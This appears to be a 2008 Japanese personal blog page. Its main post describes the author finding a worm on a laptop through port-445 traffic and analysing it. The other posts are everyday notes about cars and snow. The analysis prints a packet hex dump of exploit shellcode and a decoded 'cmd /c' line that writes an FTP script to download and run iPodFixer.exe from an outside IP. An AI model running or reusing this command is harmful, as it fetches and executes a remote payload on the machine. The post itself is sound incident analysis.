Kaz@EP3のブログ一覧

eMobileでのブラウジングがやけに遅いなぁ、とここ２～３日気になっていました。が、月曜日に羽田空港でhotspotを使用中に、WrbPageが見られないという問題が頻繁に発生。
仕事しようと思ってフライトの４時間前からラウンジに陣取っていたのに、殆ど仕事が出来ませんでした。

なにか余計なプログラムがバージョンアップのために勝手にダウンロードしてるとか、そう言うことも考えてnetstatを実行。なんかいろんなIPのmicrosoft-ds:445ポートにいくつもコネクションがあるのを発見。

ん？これってもしかしてウィルス？

普段うちのパソコンは安全圏にあるとか、ZoneAlarm動かしてるとか安心していて、公衆回線で使うノートには対処がしてありませんでした。おまけにここ何ヶ月かセキュリティーアップデートを怠っている。

コレは、ヤバイと思い、あわててトレンドのオンラインスキャンを実行。しかし、１時間かけて全ディスクをッスきゃんしてもウィルスは発見できず（アドウェアは２つほど見つかりましたが）

間違いかなぁ、と思いつつ、昨日も色々と調査を進めると、eMobileや無線LANが繋がると同時にワッと445への接続が始まるし、思いっきり怪しい。

パケットモニタで445への送信パケットを調べてみると・・・


[取得日時:2008/11/25 20:23:54.125]

【 IPヘッダ 】
バージョン : 4
ヘッダ長 : 5 ( 20 byte )
サービスタイプ : 0x00
全パケット長 : 1500 byte
識別子(ID) : 42579 ( 0xA653 )
フラグ : 0x2 ( フラグメント禁止, 最終フラグメント )

～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～

00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F 0123456789ABCDEF
+-------------------------------------------------+-----------------+
00000000 | 45 00 05 DC A6 53 40 00-7F 06 25 A6 72 30 3B 30 | E..ﾜｦS@...%ｦr0;0
00000010 | 72 30 0A 92 06 07 01 BD-0F 82 35 CF 74 57 DD F4 | r0.・..ｽ.・ﾏtWﾝ

～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～～

00000510 | 60 56 EB 0D 68 EF CE E0-60 68 98 FE 8A 0E 57 FF | V・h・濮h・・W
00000520 | E7 E8 EE FF FF FF 63 6D-64 20 2F 63 20 65 63 68 | 鉅・cmd /c ech
00000530 | 6F 20 6F 70 65 6E 20 31-31 34 2E 34 38 2E 35 39 | o open 114.48.59
00000540 | 2E 34 38 20 31 39 39 33-39 20 3E 3E 20 69 69 20 | .48 19939 >> ii
00000550 | 26 65 63 68 6F 20 75 73-65 72 20 61 20 61 20 3E | &echo user a a >
00000560 | 3E 20 69 69 20 26 65 63-68 6F 20 62 69 6E 61 72 | > ii &echo binar
00000570 | 79 20 3E 3E 20 69 69 20-26 65 63 68 6F 20 67 65 | y >> ii &echo ge
00000580 | 74 20 69 50 6F 64 46 69-78 65 72 2E 65 78 65 20 | t iPodFixer.exe
00000590 | 3E 3E 20 69 69 20 26 65-63 68 6F 20 62 79 65 20 | >> ii &echo bye
000005A0 | 3E 3E 20 69 69 20 26 66-74 70 20 2D 6E 20 2D 76 | >> ii &ftp -n -v
000005B0 | 20 2D 73 3A 69 69 20 26-64 65 6C 20 69 69 20 26 | -s:ii &del ii &
000005C0 | 69 50 6F 64 46 69 78 65-72 2E 65 78 65 0D 0A 00 | iPodFixer.exe...
000005D0 | 42 42 42 42 42 42 42 42-42 42 42 42 | BBBBBBBBBBBB

---------------------------------------------------------------------------------


ん？

んん～？

アドレス527から展開すると・・・・

cmd /c echo open 114.48.59.48 19939 >> ii &
echo user a a >> ii &
echo binary >> ii &
echo get iPodFixer.exe >> ii &
echo bye >> ii &
ftp -n -v -s:ii &
del ii &
iPodFixer.exe

ウィルス決定！

あぁ～これでこのPCは仕事で使えなくなった・・・


しかしトレンドでも、後で行ったシマンテックのスキャンでも検出されない新種ウィルス？
そんな宝くじみたいな事ってあるんでしょうか。海外にもまだ類似の事例がありませんし。
第一発見者は名前付けたり、情報提供代としてウィルスバスター１年分タダになったりするのかな（笑

そんな場合じゃない！あわててオンラインでウィルスバスターを購入し、トレンドに解析結果を送りました。回答が来るまでにどれだけ時間がかかるのか。

来週社内プレゼンまでに直ってくれることを祈りつつ・・・








<< 解説 >>

・mixrosoft-ds:445
ポート445でNetBios系の通信に使われているポートです。
ここには複数の脆弱性が見つかっており、つい１０月２４日にMS08-067の緊急パッチがMSより出ています。IPアドレスを端から順番に使って445へ接続するようなのは完全にウィルスです。

・パケット
脆弱性を突く方法で最もよく使われるのが、バッファオーバーランという手法です。受け取ったデータが設計の想定以上に大きな場合、受け取ったデータをしまっておく領域を超えて、次のプログラムまで書き換えてしまう場合があります。データを調整して、ちょうどプログラムが流れる場所に悪質なプログラムを書いておけば、プログラムを書き換えることが可能です。
このパケットの前後では複数にわけて1500バイト近くの内容のないデータがいくつも送信されていますので、明らかにバッファオーバーランを狙ったものであることが想像できます。

・データについて
「cmd/c」は、NTのcmd.exeに対するコマンド実行の指示です。
「echo ・・・>>ii」は、「・・・」という文字列をファイル「ii」に追加書き込みする指示です。「&」は複数の指示を１行で実行するためのセパレータです。

ここでは、「ii」というファイルにFTPコマンドでアドレス「114.48.59.48」のポート「19939」に接続し、バイナリモードでファイル「iPodFixer.exe」を取ってこい、という指示が書いてあり、FTPを実行した後、ダウンロードした「iPodFixer.exe」を実行しています。

「114.48.59.48」はこの時点での私のPCのアドレスですし、「19939」でFTPなんて上げてません、。さらに、別の宛先に向けたパケットではポート番号が違っていました。

・ランダムな宛先に445ポートで複数接続
・とんでもなくでかいデータを送っている
・データの中に、送信元にランダムなポートで上げたFTPからファイル落として実行しろ、と言う指示が書いてある

これは通常のアプリではあり得ないことですので、ウィルスと判断しました。
あぁこれは××のツールの特徴なんですよ、ってな恐れもあったんですが、間違いないかと。

行きも何とか収まって、布チェーンは付けずに苫小牧まで到着しました。
余裕を持って出たのでいつになく早着。
まだ２時間近く待つことになりそうです。

しかしビビって高速を使ったため、塩カルの餌食に

あぁ、早く洗車したい～

なんか苫小牧はとても暖かいです

１ピクセル１０ｍだそうです。
それにしてもスターデストロイヤーでかい


上の真ん中へんにヤマトがいますが、宇宙戦艦ではないようです。










原画（２０００×２０００ピクセル）
http://gigazine.net/index.php?/news/comments/20070101_starship_size_comparison/

昨日は降るぞ～降るぞ～ってさんざん脅かされて、シビックを会社において帰ったのに、今日の朝の天気の良いことと言ったら！

で、今日は意地になってシビックで帰宅。後輩とボウリングやって出てきたら、さっきまでの秋北海道が完全に冬北海道に変化。

湿雪で吹き飛ばないし、寒いので溶けないから、まだ積雪数センチなのに道もなにもペンキ塗ったみたいに真っ白。まるで根雪のよう。車には数センチ吹き溜まっていて。

思いがけなく（？）RE11の雪上性能チェックとなりました（泣

会社までおそるおそる行って、アルトに乗り換えてきましたが。

一応、AutoSockという噂の布チェーンを購入してあります。でも圧雪路でない場合５０ｋｍが限度とのこと。厚別から苫小牧までギリギリの距離なので着けたくありませんでした。

金曜の夜までに溶けるといいな。荒れるのは明日までって言ってたから。

大阪からはるばる札幌まで、陸送で愛車が帰ってきました。

かなり嬉しくて、仕事中だけどちょっとだけ・・・あ、ガソリンがカラなので給油しよう。
スタンドで給油始めたら

財布がない

自宅に忘れたことを説明したら車検証のコピーと電話番号をと言われて、あぁクルマの中にありますからと捜すものの、

車検証がない

後で確認したところ南部さんの所にまだあるようでしたが、免許証も財布なので代わりに社員証を置いて、自宅に帰ると今度は

カギがない

会社に戻ってカギ取って、自宅に帰って財布取って、スタンドでお金支払ってやっと、デスクに戻りました。

約束していたモデムカードを自宅に置いてきてもう一回自宅に帰ったのはナイショです。

いいか、ちょっとだけど運転できたし。

うれしさのあまりドタバタの一日でした。